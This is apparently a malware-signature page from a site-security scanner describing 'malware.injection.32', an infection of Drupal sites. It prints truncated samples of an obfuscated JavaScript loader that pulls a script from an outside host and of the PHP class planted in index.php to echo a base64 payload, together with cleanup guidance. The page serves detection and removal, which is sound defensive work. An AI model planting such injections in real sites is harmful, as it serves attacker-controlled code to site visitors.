SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware.injection.32

malware.injection.32

Description:
Injection of an obfuscated script from hxxps://track.amishbrand[.]com/s_code.js?...

Typical sample:

<script>
;(​function(){var x=navigator[m("4t}​n)e}gnA(r;eistu}")];var y=document[m(":e}idk​,owodc,")];​if(s(x,m("0s7w)​obd)n)i(W{"))&​&!s(x,m("&dui{o;r,den;Aj"))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=document.createElement('​script');b.type='text/javascript';b.async=true;b.​src=m('b2)...skipped...o.parentNode.​insertBefore(b,o);}}function m(v){var ...skipped...{var k='';for(var p=​t.length-1;p>=0;p-​-){k+​=t[p];}return k;}​})();
</script>

Cleanup

This malware can be injected into index.php files of Drupal sites in a from of the following PHP code, which needs to be removed to clean the site.

<?php

class SoFooterClass{

    public $data = 'PHNjcmlwdD4KOyhmdW5jdGlvbigpe3ZhciB4PW5hdmlnYXRvclttKCI0d...skipped...ZXR1cm4gazt9fSkoKTsKPC9zY3JpcHQ+';

    public function __destruct(){

        echo base64_decode($​this-​>data);

    }

}

$​sofooter = new SoFooterClass();

?>

Affecting:
Drupal.

Mitigation:
How to clean a hacked Drupal site